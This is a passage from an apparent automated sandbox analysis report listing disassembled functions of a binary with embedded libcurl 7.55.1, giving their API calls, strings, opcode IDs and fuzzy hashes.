                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_lstrtoll
                                      • String ID: @$Content-Length: %I64d
                                      • API String ID: 2842949177-2766406558
                                      • Opcode ID: a12b2557461db6494cbfbc74bacf0d70fea610ad595cae0e8d01e4e3663e51af
                                      • Instruction ID: 63772f2d5a84fb64129000083178ab61728b2fc49d02aa9e98f2c8d457690f65
                                      • Opcode Fuzzy Hash: a12b2557461db6494cbfbc74bacf0d70fea610ad595cae0e8d01e4e3663e51af
                                      • Instruction Fuzzy Hash: B2318422A1C69585F720AB21E4002BEE694FF48BA4FD84235DEAD077D5CF38D406B7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isspace$free
                                      • String ID: realm
                                      • API String ID: 3795756782-4204190682
                                      • Opcode ID: f2feda195b16e0f12254e1e71f1cc0114987850b4c514c672a2e277607d98bb0
                                      • Instruction ID: 136282a4e700c06d6f4d6735dacf407c4fcd33ea08147b7c8889ab4870e22bfd
                                      • Opcode Fuzzy Hash: f2feda195b16e0f12254e1e71f1cc0114987850b4c514c672a2e277607d98bb0
                                      • Instruction Fuzzy Hash: 01314F21A0CA4581EF60AF21E8103B9E390FF4C784F881175DAAD466C5DF2CE94D96A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F8D464D5), ref: 00007FF7F8D246AC
                                      • __swprintf_l.LIBCMT ref: 00007FF7F8D246CF
                                        • Part of subcall function 00007FF7F8D0E5B4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231CA,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E5DE
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F8D464D5), ref: 00007FF7F8D24719
                                        • Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E696
                                        • Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E6AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc$__swprintf_l
                                      • String ID: %s:
                                      • API String ID: 158892512-64597662
                                      • Opcode ID: e9ad506c6c27a7294fe83e672d393d2edb0c3b1a5bad13914f5db32b8e257b0e
                                      • Instruction ID: 1c02ab4c96e002fbbc5f58f9f20ddac21e280f66286c981ce93bc9fbcd94c08d
                                      • Opcode Fuzzy Hash: e9ad506c6c27a7294fe83e672d393d2edb0c3b1a5bad13914f5db32b8e257b0e
                                      • Instruction Fuzzy Hash: 9A218D22609A8291EB10EF22E8504AAE724FF98BD4FC94131EE7D477D5DE3CD50AD394
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF7F8D19168: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FF7F8D19212,?,?,?,?,00000000,?,?,00007FF7F8D19449,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19185
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D1925E
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D19449,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D192BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _time64freetolower
                                      • String ID: %s:%d$Hostname in DNS cache was stale, zapped
                                      • API String ID: 489579257-2902227024
                                      • Opcode ID: ab1ed2304c45dd4d15bfc7bc2af32bf9a152f23f0596b15316bc2318ca23d281
                                      • Instruction ID: 9bef5285747b4e9ffe2c7f6ff199e11921182ba2416730975ff55fb0b8ecebfa
                                      • Opcode Fuzzy Hash: ab1ed2304c45dd4d15bfc7bc2af32bf9a152f23f0596b15316bc2318ca23d281
                                      • Instruction Fuzzy Hash: 60218222A49A4294FB50AB31A854279E350AF4CBE8FC84231DE2E077D5DF2CE4499768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_lfree
                                      • String ID: %c%03d$%s %s
                                      • API String ID: 399239331-883683383
                                      • Opcode ID: b95e8a4c058bbb5882e88616f1d7c7f3a06e1938dfbf268e8ec740d8ff33e9f1
                                      • Instruction ID: 6f72d4fb5b25188faf90db5ce22e5cdeacda5bd04f0dbf93cac07b44e40013be
                                      • Opcode Fuzzy Hash: b95e8a4c058bbb5882e88616f1d7c7f3a06e1938dfbf268e8ec740d8ff33e9f1
                                      • Instruction Fuzzy Hash: C2110872B14646C3E718DB29F811998E755EB887C0F988031DA6D4BB90DF38E516D750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_lmalloc
                                      • String ID: %02x:$TUUUUUUU
                                      • API String ID: 1671605834-3311576412
                                      • Opcode ID: 22b0d585f3bc2be9592d8c370e631dd19d8e37527e3973fa074162809d6d837c
                                      • Instruction ID: b4aaaccac759b8e1e1c0229e773153575eac173600d57db94594f44b30b1140c
                                      • Opcode Fuzzy Hash: 22b0d585f3bc2be9592d8c370e631dd19d8e37527e3973fa074162809d6d837c
                                      • Instruction Fuzzy Hash: 2C01E121B0DA9A85EB11EB52B944278E360EF4CFD0F984071DE6D07B88DE78D44AC784
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l
                                      • String ID: 7.55.1$WinSSL$libcurl/7.55.1 WinSSL
                                      • API String ID: 1488884202-1485548533
                                      • Opcode ID: b5e722d6e4550c3a6fe4071394778a2e989954348b595104c290ed9faddd702d
                                      • Instruction ID: 2e9d539184c0fe82793f814861722558802b53de4fd3baf80e1ea200d03b29c0
                                      • Opcode Fuzzy Hash: b5e722d6e4550c3a6fe4071394778a2e989954348b595104c290ed9faddd702d
                                      • Instruction Fuzzy Hash: 56114F50E0CA8AC5F755EF24B900279E790EF19370FC84236C87C465E1DE2DA58CEBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLastsend
                                      • String ID: SENT$Sending data failed (%d)
                                      • API String ID: 1802528911-3459338696
                                      • Opcode ID: cc31b0e0a4723b077441de42638e4246d96d83c0e533f940623c911a07b3cb2b
                                      • Instruction ID: 729976ef5a1066842982db42887d98ee14ea06edae873fcf2aa9f090a559047c
                                      • Opcode Fuzzy Hash: cc31b0e0a4723b077441de42638e4246d96d83c0e533f940623c911a07b3cb2b
                                      • Instruction Fuzzy Hash: 4001F532708A9281DB10AB26E400458FB20FF98FC4B895131DF2D47B55CF39D509C798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: calloc
                                      • String ID:
                                      • API String ID: 2635317215-0
                                      • Opcode ID: d61fca85e2f26253552de7d92bd639a836b333907e1a8300864bb32f709c88ae
                                      • Instruction ID: 39914a5ed92a9773111d78d89862c18eb92af1cf675ebe577f2f2df8a9b89bea
                                      • Opcode Fuzzy Hash: d61fca85e2f26253552de7d92bd639a836b333907e1a8300864bb32f709c88ae
                                      • Instruction Fuzzy Hash: 26912726609FC19AE7599F34A9503EAEBA0FF59750F480135CBBD43382DF28A078D764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc
                                      • String ID:
                                      • API String ID: 2190258309-0
                                      • Opcode ID: 2e1cdd1845b81a547b8bc6720509006ef11d1e6a62c444f2414c969130b61b4c
                                      • Instruction ID: 7a341fb73f137209165c6f75aa8beeb73bbb7018dfdbb602a7c5408dae378f2b
                                      • Opcode Fuzzy Hash: 2e1cdd1845b81a547b8bc6720509006ef11d1e6a62c444f2414c969130b61b4c
                                      • Instruction Fuzzy Hash: 8E311E25A09B46C6EB24AF26F850269E360FF9DF80F984035CE5E47791DE3CE4499398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 4baa3586fc67abeea6d6de94767f8e4852ea18f4046d09bbe174e9b88345fb76
                                      • Instruction ID: 69f0bf42b81a930e3b186e1a6ecb4d77393d5197cd04bb6b2f52137a14a94311
                                      • Opcode Fuzzy Hash: 4baa3586fc67abeea6d6de94767f8e4852ea18f4046d09bbe174e9b88345fb76
                                      • Instruction Fuzzy Hash: 1D111225A4DE85C2EB54AB62F950178E324FF5CB90F8C1031DE1E47B90CF2CE4599798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02B59
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02B7E
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02BA3
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02BC8
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02BED
                                        • Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E696
                                        • Part of subcall function 00007FF7F8D0E668: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7F8D231F1,?,?,?,00007FF7F8D23369,?,?,?,00007FF7F8D0FED2), ref: 00007FF7F8D0E6AF
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: c21e3163258db4359c98e0b08787f574f171087142a2359bd8586bcf2f5b4aba
                                      • Instruction ID: 6b9d8cc5161068ccb1333ec40de4927ae0905dfb604fe8bef988ff9422bcfa98
                                      • Opcode Fuzzy Hash: c21e3163258db4359c98e0b08787f574f171087142a2359bd8586bcf2f5b4aba
                                      • Instruction Fuzzy Hash: 0621C711A19A4A82FB05BF22F855378E3A0AF5DF54FCC0174C92D4A1D9DE6CE04CA7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _errnomallocreallocstrtoll
                                      • String ID:
                                      • API String ID: 4115862152-0
                                      • Opcode ID: ac3934b59f80577bf95706b4dd1ee4f4e29e9a77cee6c38c5cad01d9a06c64a7
                                      • Instruction ID: 2984007e0f6cdf2f300225de2a9166e1cd82554001d99ac2fa28b58eb45a05b0
                                      • Opcode Fuzzy Hash: ac3934b59f80577bf95706b4dd1ee4f4e29e9a77cee6c38c5cad01d9a06c64a7
                                      • Instruction Fuzzy Hash: 38B1D82190E28286FFE0AB25905877DE794FF08750F8E5175CA7E472D0DE389888E7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: freemalloc
                                      • String ID: Excessive server response line length received, %zd bytes. Stripping$response reading failed
                                      • API String ID: 3061335427-128329444
                                      • Opcode ID: 4bc1a3ba90e7650c2e1ab9f6cb697c01b491abeb558399c9548ca29450d0e082
                                      • Instruction ID: d80256851c352984df0888cca8f014a8dfb154e4b5374eefd940af9d4a94b0e9
                                      • Opcode Fuzzy Hash: 4bc1a3ba90e7650c2e1ab9f6cb697c01b491abeb558399c9548ca29450d0e082
                                      • Instruction Fuzzy Hash: 7191D22260DB8582EB19AB16E5447AEE360FF49B90F884075DEAD07BC4DF3CD458D394
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • %s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x, xrefs: 00007FF7F8D47749
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc
                                      • String ID: %s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x
                                      • API String ID: 2190258309-3654824481
                                      • Opcode ID: fd88724f91d92cee37a979787776ce6bb5320076e8e4ccdb819f17ee8a2d188f
                                      • Instruction ID: 29972e050164f2517ff38598f5f0addaf7a7148728603c1e080a88a5ba6552b8
                                      • Opcode Fuzzy Hash: fd88724f91d92cee37a979787776ce6bb5320076e8e4ccdb819f17ee8a2d188f
                                      • Instruction Fuzzy Hash: D9919F22B086859AEB10AF26E4502ADFB61FB4D784F884071DFAD17B95CF3CD1189764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: %s$--url$option %s: %s
                                      • API String ID: 2803490479-3421415073
                                      • Opcode ID: 7186fe7eb08453efbda96950140b5d89ad613572c0bb782e370295c8b953767e
                                      • Instruction ID: bda90bf929c5181515fd9eef1d56a9423a2cf6471a13018ef4d69f44a5ff2197
                                      • Opcode Fuzzy Hash: 7186fe7eb08453efbda96950140b5d89ad613572c0bb782e370295c8b953767e
                                      • Instruction Fuzzy Hash: 7F61F462A0C7C282E761AB15A4502BAFBA4FF48754F848035DABD437C9DF3CE449D768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D227FC
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D22907
                                      • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7F8D22963
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D229A4
                                        • Part of subcall function 00007FF7F8D2168C: _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000001,00007FF7F8D22B1A,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D216A5
                                        • Part of subcall function 00007FF7F8D21700: inet_pton.WS2_32 ref: 00007FF7F8D21725
                                        • Part of subcall function 00007FF7F8D21700: inet_pton.WS2_32 ref: 00007FF7F8D2173A
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _time64inet_pton$freemallocqsort
                                      • String ID:
                                      • API String ID: 1958717517-0
                                      • Opcode ID: 51352d9ffd6e313afe23b07970a0e9d4b67595476362b460e40858083a4cbb13
                                      • Instruction ID: 79656d536d2657f7913ace6b3fba47c4b37fadec231a2e8e42cfff567b900342
                                      • Opcode Fuzzy Hash: 51352d9ffd6e313afe23b07970a0e9d4b67595476362b460e40858083a4cbb13
                                      • Instruction Fuzzy Hash: B5519321B0964241FF1AAF22A510379E2A0BF5DFD4F8C4031EE6D477D5DE3CE449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc
                                      • String ID: Failed to alloc scratch buffer!
                                      • API String ID: 2190258309-1446904845
                                      • Opcode ID: a59c3e0831f807650454327b5fc6bb44cde1d181724f50777204d164c057ca1a
                                      • Instruction ID: 2cbbb0283ac3634132d4c1e53b9047c1c28e4a5f2e42318b2d10ad1d4f3ce2ab
                                      • Opcode Fuzzy Hash: a59c3e0831f807650454327b5fc6bb44cde1d181724f50777204d164c057ca1a
                                      • Instruction Fuzzy Hash: F151A322A09B8596EB10EF25E8047A9E7A0FF0D784F980035DB6D07795DF3CE458E398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: .
                                      • API String ID: 1294909896-916926321
                                      • Opcode ID: 7e67a81e3a080e7d61ae5db57032cacf38bc9c7963bc5e3a0a4640a0d5f47535
